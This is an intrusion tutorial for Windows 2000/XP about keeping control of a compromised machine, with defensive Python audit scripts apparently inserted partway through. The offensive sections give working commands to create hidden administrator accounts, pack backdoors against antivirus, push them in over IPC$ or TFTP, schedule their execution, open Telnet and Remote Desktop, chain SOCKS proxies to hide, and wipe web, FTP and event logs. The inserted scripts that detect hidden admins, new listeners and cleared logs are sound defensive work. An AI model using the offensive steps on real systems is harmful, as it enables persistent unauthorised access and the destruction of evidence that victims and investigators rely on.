After Intruding a System
By heiyeluren
We know that breaking into a system is sometimes quite simple, but doing the work that follows an intrusion is not so easy. As the saying goes, "conquering the empire is easy, holding it is hard", so what you do after intruding a system matters a great deal and must be done carefully. This article is written from that angle, to tell beginners what to do once they have obtained permissions on a system; I hope it is of some help to them.
Note: unless otherwise stated, "the system" in this article refers to Windows 2000 / Windows XP.
1. Getting permissions (outside the scope of this article; we only discuss what you do after you have intruded the system)
2. Establishing a super-privileged user
(1) Create a user:
For example: net user system$ hacker /add
net localgroup administrators system$ /add
Note: the two commands above create an administrator-privileged user named "system$" with the password "hacker".
(2) Clone a super user:
You can use the CA tool to clone a super user; the only prerequisite is that you have the account name and password of an administrator on the target system.
ca \\ip Administrator password IUSR_name password
Description: Administrator - the administrator account; password - the administrator account's password
IUSR_name - the user to clone; password - the cloned user's password
CCA: a tool to check the result of the cloning.
cca \\ip user password
user: the cloned account
password: its password
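From the defender's side, the hidden-account trick above is easy to audit. The following Python script is an added example (not from the original article): it parses the text output of "net user" and "net localgroup administrators" and flags account names ending in "$" as well as any Administrators member outside an assumed baseline. The sample command output and the baseline set are constructed for the example. A cloned account in the CA sense does not necessarily appear as a group member, so this check covers the first technique; checking for clones needs a dedicated tool such as the CCA checker the article mentions.

```python
"""Audit local accounts for the hidden-user trick described above.

Added example (not from the article). It flags:
  * account names ending in '$', the naming convention used above so that
    the account is easy to overlook in casual listings;
  * members of the local Administrators group outside an assumed baseline.
The command output below is constructed for the example, not captured
from a real host; the parser relies only on the dashed separator line and
the trailing status line that `net` commands print.
"""
import re
from typing import Dict, List, Set

NET_USER_OUTPUT = """\
User accounts for \\\\WEB01

-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_WEB01
IWAM_WEB01               system$
The command completed successfully.
"""

NET_LOCALGROUP_OUTPUT = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access

Members

-------------------------------------------------------------------------------
Administrator
system$
The command completed successfully.
"""

# Assumed baseline: the only account that should be a local administrator.
EXPECTED_ADMINS: Set[str] = {"administrator"}


def _body_lines(output: str) -> List[str]:
    """Lines after the dashed separator, minus blanks and the status line."""
    lines = output.splitlines()
    start = next((i + 1 for i, l in enumerate(lines) if l.startswith("----")), None)
    if start is None:
        return []
    return [l for l in lines[start:]
            if l.strip() and not l.lower().startswith("the command")]


def parse_net_user(output: str) -> List[str]:
    """`net user` prints several names per line, separated by runs of spaces."""
    names: List[str] = []
    for line in _body_lines(output):
        names.extend(n for n in re.split(r"\s{2,}", line.strip()) if n)
    return names


def parse_net_localgroup(output: str) -> List[str]:
    """`net localgroup <group>` prints one member per line."""
    return [l.strip() for l in _body_lines(output)]


def audit_accounts(net_user_output: str, localgroup_output: str,
                   expected_admins: Set[str] = EXPECTED_ADMINS) -> Dict[str, List[str]]:
    """Return the suspicious accounts found in the two listings."""
    users = parse_net_user(net_user_output)
    admins = parse_net_localgroup(localgroup_output)
    return {
        "dollar_suffix_accounts": [u for u in users if u.endswith("$")],
        "unexpected_admins": [a for a in admins if a.lower() not in expected_admins],
    }


if __name__ == "__main__":
    for finding, names in audit_accounts(NET_USER_OUTPUT, NET_LOCALGROUP_OUTPUT).items():
        print(f"{finding}: {names}")
```

On a real host, feed the script the saved output of the two commands instead of the constructed strings, and keep the baseline set in version control so that a diff, not a human eye, spots a new administrator.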
3. Establishing a back door
(1) Upload the back-door program (there are many methods; only two common ones are covered):
Upload a back door such as Wollf or WinShell. It is best to pack the back door with a packer such as UPX or ASPack, so that it is less likely to be killed by the antivirus firewall.
Methods of uploading the back door:
(a) Use IPC$: first establish a connection to the target:
net use \\target_ip\ipc$ "password" /user:"username"
After the connection is established, you can upload the back door:
copy c:\hack\wollf.exe \\ip\admin$
Description: this sends the Wollf back door from your C: drive to the target's x:\winnt or Windows directory (admin$ is the target's system root).
(b) Use TFTP: the prerequisite is that you have already entered the target, for example through Telnet.
From the target's shell you can then pull the back door from your own machine:
tftp -i your_ip get wollf.exe
Description: this downloads wollf.exe from your machine into the target's system directory. The prerequisites are that the target has not blocked TFTP and that you have an independent IP address (a machine inside a LAN will not work); your own machine runs the TFTPD32 tool, which listens for connections on port 69, and the target can then download from your machine.
(2) Run the back door:
(a) Use the AT command:
First get the target system's time: net time \\target_ip
Once you have the target's time, use the AT command: at \\target_ip time path_of_the_back_door_on_the_target
Example: at \\192.168.0.1 11:02 c:\winnt\system32\wollf.exe
Note: to execute the AT command you must already have an IPC$ connection to the target, and once you have the target's time, the time you schedule for running the back door must be a few minutes later than it. Besides the AT command, you can use a tool called psexec.exe to achieve the same function as AT.
(b) Use the "planter" function of a scanning tool to copy and run the back door; this method is described in that tool's help file.
(c) Run the back door directly:
You can run it directly after logging in to the target, for example after entering the target via Telnet.
If the target does not have Telnet open, we can help it open.
Open the target's Telnet:
We can use the OpenTelnet.exe tool to do this, provided that we have administrator privileges on the target system and IPC$ is available.
The command is as follows:
opentelnet \\ip username password NTLMAuthor telnetport
Description: \\ip - target IP; username - user name; password - password
NTLMAuthor - the NTLM authentication mode; telnetport - the port
The authentication modes are: 0: do not use NTLM authentication; 1: try NTLM authentication first and fall back to password authentication on failure; 2: use NTLM authentication only.
Once it runs successfully, you can log in to the target with "telnet ip port" or "nc -vv ip port".
4. Making a proxy server
I won't go into why you need a proxy; let's just talk about how to make one.
Here we use the tool SkServer.exe, a proxy tool written by Snake that makes a fine springboard!
First write a batch file with the following content:
@echo *******************************************************
@echo Installing the batch of the Socket agent
@echo by heiyeluren
@echo cqsn --- http://www.hackerxfiles.com/
@echo *******************************************************
@pause
@skserver -install
@echo install ... succeed!
@SKServer -Config Port 1983
@echo set port in 1983 ... succeed!
@SKServer -Config StartType 2
@echo set starttype is autostart ... succeed!
@NET START SKSERVER
@echo start service ... succeed!
@echo ok ... install end!
@pause
@exit
The batch above can be changed to suit the situation, and "skserver" can be changed to whatever you name the program, but "net start skserver" cannot be changed, as that is the tool's default service name; you can also change the port to whatever you require. After sending SkServer.exe to the target and running the batch, you can connect to the proxy on the target's port 1983, and with SocksCap you can chain proxies through it, up to 254 hops; who could find you then? Ha ha ~~~
5. Opening the terminal service
If the target is Windows 2000 Server or later, you can open its terminal service for better remote control. Everyone says a 3389 box is the best kind of zombie. Now let's try it! ~~
(1) Open the terminal manually:
After entering the target system, enter the following (assuming the system is under c:\winnt):
echo [Components] > c:\3389
echo tsenable = on >> c:\3389
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\3389 /q
(You can add the /r parameter to suppress the reboot; the component is then not installed until the machine restarts.) Alternatively, you can write the file yourself and transfer it to the target:
[Components]
tsenable = on
Save it as a file named 3389, then run the command sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\3389 /q, and you have a 3389 box; you can then connect to the target with "Remote Desktop Connection" and control it from your Windows desktop.
(2) Use a tool:
Here a small tool called DixYxs.exe is used to open the target's terminal.
Upload this tool to the target and run the program DixYxs.exe; wait a moment and the box will be restarted, and the terminal service will be there after the restart.
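Sections 3 to 5 each leave a new listening port on the victim: Telnet on 23, the SkServer proxy on 1983 and Terminal Services on 3389. As an added example (not part of the original article), the Python below compares a baseline "netstat -an" capture with a current one and reports every newly listening socket, annotating the ports this article's steps would open. The two captures are constructed, and the "PORT_NOTES" mapping and the assumption that a baseline was recorded while the host was known-good are mine.

```python
"""Report listening sockets that were not present in a baseline netstat capture.

Added example, not the article's code. Both captures below are constructed;
on a real host save `netstat -an` output while the machine is known-good and
compare against it periodically. Unknown new ports are reported too.
"""
import re
from typing import Dict, List, Set, Tuple

BASELINE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
"""

CURRENT_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1983           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.168.0.1:80         10.0.0.5:4412          ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

# Ports the post-intrusion steps in this article open on the victim (my mapping).
PORT_NOTES: Dict[Tuple[str, int], str] = {
    ("TCP", 23): "Telnet (opened with OpenTelnet in section 3)",
    ("TCP", 1983): "SOCKS proxy (the SkServer batch in section 4 sets port 1983)",
    ("TCP", 3389): "Terminal Services (tsenable=on in section 5)",
}

# Proto, local address, local port, foreign address, optional state column.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_listeners(netstat_output: str) -> Set[Tuple[str, int]]:
    """(proto, port) for every bound socket: TCP only in LISTENING state,
    UDP always, since UDP lines carry no state column."""
    listeners: Set[Tuple[str, int]] = set()
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank, or unrelated line
        proto, _local, port, _foreign, state = m.groups()
        if proto == "UDP" or state == "LISTENING":
            listeners.add((proto, int(port)))
    return listeners


def new_listeners(baseline: str, current: str) -> List[Tuple[str, int, str]]:
    """Sockets listening now but not in the baseline, each with a note."""
    added = parse_listeners(current) - parse_listeners(baseline)
    return sorted((proto, port, PORT_NOTES.get((proto, port), "unknown; investigate"))
                  for proto, port in added)


if __name__ == "__main__":
    for proto, port, note in new_listeners(BASELINE_NETSTAT, CURRENT_NETSTAT):
        print(f"NEW {proto}/{port}: {note}")
```

A new listener is only a lead: confirm it by matching the port to its owning process and service entry, and treat an unknown port exactly like a known one until it is explained.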
6. Clearing logs
When you have done all of this, you don't want to be discovered within three minutes, do you? Then you should clear the logs. Windows logs include: the WWW log, FTP log, DNS log, security log, system log, application log, and so on.
(1) Clear logs by hand:
Some logs must be deleted, such as the web and FTP logs.
Default log file locations:
Application log, security log, system log, DNS log default location: %systemroot%\system32\config; the default file size is 512KB, and the administrator can change this default size.
Security log file: %systemroot%\system32\config\SecEvent.Evt
System log file: %systemroot%\system32\config\SysEvent.Evt
Application log file: %systemroot%\system32\config\AppEvent.Evt
IIS FTP log default location: %systemroot%\system32\logfiles\msftpsvc1\, one log file per day by default
IIS WWW log default location: %systemroot%\system32\logfiles\w3svc1\, one log file per day by default
Scheduler service log default location: %systemroot%\schedlgu.txt
After stopping the relevant service, we can delete its log:
Stop the service: net stop w3svc
Then you can delete the log. The WWW service's logs are in the c:\winnt\system32\logfiles\w3svc1 directory; the FTP service's logs are in the c:\winnt\system32\logfiles\msftpsvc1 directory. You can use del:
del c:\winnt\system32\logfiles\w3svc1\*.* /q
del c:\winnt\system32\logfiles\msftpsvc1\*.* /q
Then the scheduler log; stop the service: net stop "task scheduler"
Then del c:\winnt\schedlgu.txt /q will do ~
The service behind the security, system and application logs is EventLog, which cannot be stopped, so if we delete these logs by hand we have to go through a very slow method:
Open the "Event Viewer" from the "Control Panel"; its "Action" menu has an item named "Connect to another computer"; click it. Enter the remote computer's IP, wait a while (depending on the network speed between the two sides), and the target's "Event Viewer" opens. Select the remote computer's "Security" log, right-click it and choose Properties, then click the "Clear Log" button in the properties dialog. OK! The security log is cleared! Clear the "System" and "Application" logs the same way.
(2) Use tools to delete logs
Deleting those logs with tools is simple!
(A) To delete the IIS WWW and FTP logs you can use the small tool CleanIISLog.exe.
Usage:
First use the IPC$ pipe: net use \\ip\ipc$ "password" /user:"username"
Then you can use the following command:
cleaniislog <logfile>|. <cleanip>|.
Description: logfile - the log file to clean, where . means all log files; cleanip - the IP address whose records are cleared, where . means all IP records
Example: cleaniislog . 127.0.0.1
a. You can clear the connection records of the specified IP and keep the records of other IPs.
b. After clearing succeeds, CleanIISLog also clears the record of its own run from the system log.
Usage: cleaniislog
CleanIISLog can only be run locally and requires administrator permissions.
(B) To delete the security, system and application logs you can use Elsave.exe.
Instructions:
First use the IPC$ pipe: net use \\ip\ipc$ "password" /user:"username"
Clear the target system's application log:
elsave -s \\ip -l "application" -c
Clear the target system's system log:
elsave -s \\ip -l "system" -c
Clear the target system's security log:
elsave -s \\ip -l "security" -c
(C) LogKiller.exe can delete all of the target's logs, including the application log, security log, system log, the IIS FTP service log, IIS SMTP service log and IIS WWW service log, as well as the scheduled task log and so on.
How to use: after uploading the tool to the target, run it directly.
Example: c:\winnt\system32\logkiller.exe
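A defender reading this section would look for the traces that clearing leaves behind. The added Python example below (not the article's code) checks three such signals over constructed sample data: a Security log record with event ID 517 ("The audit log was cleared" on Windows 2000/XP/2003; 1102 on later versions), which is written as the first record of the freshly cleared log; a long hole between consecutive entries in an IIS W3C log on a server that is otherwise busy, which line removal can leave; and a missing file in the daily exYYMMDD.log series, left when a whole day's log is deleted. The hole threshold and the sample dates are assumptions and must be tuned to the server's real traffic.

```python
"""Defender-side checks for the log clearing described in this section.

Added example (not the article's code); all data below is constructed.
Signals checked:
  1. Security log event ID 517 ("The audit log was cleared"; Windows
     2000/XP/2003) or 1102 (Windows Vista and later). The clear itself is
     the first record in the fresh log, so it survives the clearing.
  2. A long hole between consecutive entries in an IIS W3C log on a server
     that otherwise logs steadily.
  3. A missing file in IIS's daily exYYMMDD.log series.
"""
import re
from datetime import date, datetime, timedelta
from typing import Dict, List, Tuple

CLEARED_EVENT_IDS = {517, 1102}

# Constructed Security log records as an event-log parser would yield them.
SECURITY_EVENTS: List[Dict[str, object]] = [
    {"id": 528, "time": "2003-05-10 09:12:00", "user": "Administrator"},
    {"id": 517, "time": "2003-05-10 11:05:31", "user": "Administrator"},
    {"id": 528, "time": "2003-05-10 11:06:02", "user": "system$"},
]

# Constructed IIS 5.0 W3C extended log for one day (times are UTC in this format).
IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-05-10 00:00:12
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2003-05-10 00:00:12 10.0.0.5 GET /index.htm 200
2003-05-10 00:03:40 10.0.0.7 GET /images/logo.gif 200
2003-05-10 03:59:58 10.0.0.5 GET /index.htm 200
2003-05-10 04:00:01 10.0.0.9 GET /index.htm 200
"""

# Constructed directory listing of %systemroot%\system32\logfiles\w3svc1.
PRESENT_LOGS = ["ex030508.log", "ex030509.log", "ex030511.log"]

W3C_ENTRY = re.compile(r"^(\d{4}-\d{2}-\d{2}) (\d{2}:\d{2}:\d{2}) ")


def audit_log_cleared(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Records that say the audit log was cleared, with who did it and when."""
    return [e for e in events if e["id"] in CLEARED_EVENT_IDS]


def parse_w3c_times(log_text: str) -> List[datetime]:
    """Timestamps of every data line; '#' directive lines are skipped."""
    times: List[datetime] = []
    for line in log_text.splitlines():
        m = W3C_ENTRY.match(line)
        if m and not line.startswith("#"):
            times.append(datetime.strptime(f"{m.group(1)} {m.group(2)}", "%Y-%m-%d %H:%M:%S"))
    return times


def find_gaps(times: List[datetime], max_gap: timedelta) -> List[Tuple[datetime, datetime]]:
    """Consecutive entries further apart than max_gap (tune it to the server's traffic)."""
    return [(a, b) for a, b in zip(times, times[1:]) if b - a > max_gap]


def missing_daily_logs(present: List[str], first: date, last: date) -> List[str]:
    """IIS names daily W3C logs exYYMMDD.log; return the expected names that are absent."""
    have = {p.lower() for p in present}
    missing: List[str] = []
    d = first
    while d <= last:
        name = "ex" + d.strftime("%y%m%d") + ".log"
        if name not in have:
            missing.append(name)
        d += timedelta(days=1)
    return missing


def run_checks() -> Dict[str, object]:
    """Run all three checks on the constructed data and return the findings."""
    return {
        "cleared_by": [e["user"] for e in audit_log_cleared(SECURITY_EVENTS)],
        "gap_count": len(find_gaps(parse_w3c_times(IIS_LOG), timedelta(hours=1))),
        "missing_logs": missing_daily_logs(PRESENT_LOGS, date(2003, 5, 8), date(2003, 5, 11)),
    }


if __name__ == "__main__":
    for name, finding in run_checks().items():
        print(f"{name}: {finding}")
```

None of these checks works if the logs only ever live on the compromised host, which is the real lesson of this section: ship the event logs and IIS logs to a separate collector as they are written, so that the copy the attacker can reach is not the only one.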
7. Closing
Having said all this, that should be more or less the work to be done after intruding a system. Of course you may have other jobs to do and are not limited to the modes above; what is above is just a fairly basic and commonly used set. For example, you can also set up VNC or other remote control software, or turn the target into your FTP server, but the prerequisite is that you pay attention to safety and do not leave unnecessary traces.
I don't know whether you have noticed a situation: we are all using a wide range of tools to complete our tasks, and while you don't have to stop using them, relying too heavily on tools does not bring much progress to our technique. I hope everyone will use tools sparingly; if you can do it by hand, try to do it by hand, so that you "know not only what, but why". Isn't that better?
What I have talked about may be old stuff, and many masters may not want to read it, heh; I think this article is aimed at beginners, so that everyone stops being confused by these small problems.
Disclaimer: the above is for discussion only. Any organization or individual who uses the above methods in violation of national law will be punished under criminal law, and all of it has nothing to do with the author.